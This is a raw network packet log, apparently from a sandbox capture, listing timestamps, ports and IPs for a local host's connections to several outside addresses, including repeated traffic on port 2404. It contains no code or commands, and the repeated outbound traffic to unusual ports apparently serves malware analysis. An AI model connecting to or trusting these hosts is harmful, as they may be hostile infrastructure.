                                                                  Dec 10, 2024 16:28:59.647488117 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.647774935 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.647871017 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.649112940 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.649331093 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.649451017 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.650959969 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.651211977 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.651334047 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.653460979 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.653554916 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.653656006 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.654800892 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.654867887 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.654992104 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.656073093 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.656186104 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.656250000 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.657403946 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.657463074 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.657464027 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.657530069 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.658885956 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.659106970 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.659169912 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.660358906 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.660485029 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.660566092 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.662015915 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.662075043 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.662107944 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.662614107 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.663697958 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.663814068 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.663871050 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.665280104 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.665625095 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.665709972 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.666737080 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.666924953 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.667012930 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.668404102 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.668472052 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.668518066 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.668575048 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.670108080 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.670181036 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.670475960 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.670541048 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.671972036 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.672030926 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.672131062 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.672205925 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.673588037 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.673639059 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.673829079 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.673877954 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.675369024 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.675534010 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.675633907 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.677206039 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.677370071 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.677439928 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.678868055 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.917361975 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.917433977 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.917479038 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.918123007 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.918180943 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.918270111 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.918329954 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.918878078 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.918946028 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.918982029 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.919023037 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.919526100 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.919569016 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.919687033 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.919729948 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.920137882 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.920218945 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.920326948 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.920371056 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.921111107 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.921192884 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.921304941 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.921354055 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.921905041 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.921953917 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.921994925 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.922039032 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.922565937 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.922666073 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.922696114 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.922748089 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.923176050 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.923252106 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.923357010 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.923413038 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.923841953 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.923898935 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.923932076 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.923986912 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.924529076 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.924582958 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.924756050 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.924808025 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.925234079 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.925276995 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.925364017 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.925424099 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.926024914 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.926071882 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.926148891 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.926189899 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.926736116 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.926780939 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.926832914 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.926888943 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.927401066 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.927452087 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.950304985 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.950392008 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.950413942 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.950491905 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.950612068 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.950670004 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.950855970 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.950903893 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:29:00.932171106 CET497932404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:01.051773071 CET240449793212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:01.051966906 CET497932404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:01.057996035 CET497932404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:01.178108931 CET240449793212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:02.212963104 CET240449793212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:02.256337881 CET497932404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:02.456331015 CET240449793212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:02.460714102 CET497932404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:02.580081940 CET240449793212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:02.580166101 CET497932404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:02.700342894 CET240449793212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:02.935005903 CET240449793212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:02.936688900 CET497932404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:03.058199883 CET240449793212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:03.124998093 CET240449793212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:03.127106905 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:03.178214073 CET497932404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:03.248789072 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:03.248857975 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:03.253931046 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:03.292347908 CET4980180192.168.2.7178.237.33.50
                                                                  Dec 10, 2024 16:29:03.373480082 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:03.412409067 CET8049801178.237.33.50192.168.2.7
                                                                  Dec 10, 2024 16:29:03.412617922 CET4980180192.168.2.7178.237.33.50
                                                                  Dec 10, 2024 16:29:03.413048029 CET4980180192.168.2.7178.237.33.50
                                                                  Dec 10, 2024 16:29:03.533564091 CET8049801178.237.33.50192.168.2.7
                                                                  Dec 10, 2024 16:29:04.405213118 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:04.459492922 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:04.640110970 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:04.645306110 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:04.654165030 CET8049801178.237.33.50192.168.2.7
                                                                  Dec 10, 2024 16:29:04.654408932 CET8049801178.237.33.50192.168.2.7
                                                                  Dec 10, 2024 16:29:04.654488087 CET4980180192.168.2.7178.237.33.50
                                                                  Dec 10, 2024 16:29:04.660278082 CET4980180192.168.2.7178.237.33.50
                                                                  Dec 10, 2024 16:29:04.673690081 CET497932404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:04.764790058 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:04.764888048 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:04.780711889 CET8049801178.237.33.50192.168.2.7
                                                                  Dec 10, 2024 16:29:04.794348001 CET240449793212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:04.884243965 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.115494013 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.115603924 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.115617990 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.115710020 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.116091967 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.116105080 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.116144896 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.148427963 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.148550034 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.148572922 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.148586035 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.148643970 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.149032116 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.157203913 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.157286882 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.157326937 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.165260077 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.165338039 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.308106899 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.308195114 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.308254957 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.312571049 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.312701941 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.312756062 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.320709944 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.320848942 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.320902109 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.329067945 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.329217911 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.329262018 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.337400913 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.337588072 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.337640047 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.343861103 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.344141960 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.344191074 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.352025032 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.352269888 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.352318048 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.360586882 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.360774040 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.360845089 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.368762016 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.368915081 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.368967056 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.378016949 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.378120899 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.378360033 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.386524916 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.386645079 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.386694908 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.395200968 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.395497084 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.395545959 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.428071976 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.475064039 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.499555111 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.500145912 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.500221968 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.502934933 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.503050089 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.503093004 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.509226084 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.511677980 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.511733055 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.511892080 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.518269062 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.518321037 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.518410921 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.525314093 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.525376081 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.525443077 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.533027887 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.533077955 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.533339977 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.538580894 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.538629055 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.538985014 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.544516087 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.544574976 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.544775963 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.550786972 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.550834894 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.550865889 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.557259083 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.557305098 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.557382107 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.562119961 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.562171936 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.562235117 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.567986012 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.568039894 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.568114042 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.573962927 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.574026108 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.574131966 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.580601931 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.580656052 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:05.580691099 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.586416960 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:05.586466074 CET497992404192.168.2.7212.162.149.91
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Dec 10, 2024 16:29:05.586529016 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.592628002 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.592681885 CET  49799        2404       192.168.2.7      212.162.149.91
Dec 10, 2024 16:29:05.592741966 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.598720074 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.598778009 CET  49799        2404       192.168.2.7      212.162.149.91
Dec 10, 2024 16:29:05.598817110 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.604533911 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.604574919 CET  49799        2404       192.168.2.7      212.162.149.91
Dec 10, 2024 16:29:05.604643106 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.610583067 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.610647917 CET  49799        2404       192.168.2.7      212.162.149.91
Dec 10, 2024 16:29:05.610683918 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.615626097 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.615695953 CET  49799        2404       192.168.2.7      212.162.149.91
Dec 10, 2024 16:29:05.615773916 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.621176004 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.621243000 CET  49799        2404       192.168.2.7      212.162.149.91
Dec 10, 2024 16:29:05.621274948 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.625961065 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.626008987 CET  49799        2404       192.168.2.7      212.162.149.91
Dec 10, 2024 16:29:05.626071930 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.631155014 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.631197929 CET  49799        2404       192.168.2.7      212.162.149.91
Dec 10, 2024 16:29:05.631205082 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.636030912 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.636087894 CET  49799        2404       192.168.2.7      212.162.149.91
Dec 10, 2024 16:29:05.691576958 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.691643953 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.691706896 CET  49799        2404       192.168.2.7      212.162.149.91
Dec 10, 2024 16:29:05.693994999 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.694196939 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.694247007 CET  49799        2404       192.168.2.7      212.162.149.91
Dec 10, 2024 16:29:05.699513912 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.699645042 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.699691057 CET  49799        2404       192.168.2.7      212.162.149.91
Dec 10, 2024 16:29:05.703924894 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.704073906 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.704121113 CET  49799        2404       192.168.2.7      212.162.149.91
Dec 10, 2024 16:29:05.708692074 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.708765030 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.708810091 CET  49799        2404       192.168.2.7      212.162.149.91
Dec 10, 2024 16:29:05.713310957 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.713403940 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.713445902 CET  49799        2404       192.168.2.7      212.162.149.91
Dec 10, 2024 16:29:05.717727900 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.717860937 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.717915058 CET  49799        2404       192.168.2.7      212.162.149.91
Dec 10, 2024 16:29:05.722534895 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.722548962 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.722596884 CET  49799        2404       192.168.2.7      212.162.149.91
Dec 10, 2024 16:29:05.725729942 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.725828886 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.725882053 CET  49799        2404       192.168.2.7      212.162.149.91
Dec 10, 2024 16:29:05.729163885 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.729242086 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.729296923 CET  49799        2404       192.168.2.7      212.162.149.91
Dec 10, 2024 16:29:05.732780933 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.732924938 CET  2404         49799      212.162.149.91   192.168.2.7
Dec 10, 2024 16:29:05.733093023 CET  49799        2404       192.168.2.7      212.162.149.91
Dec 10, 2024 16:29:05.736511946 CET  2404         49799      212.162.149.91   192.168.2.7
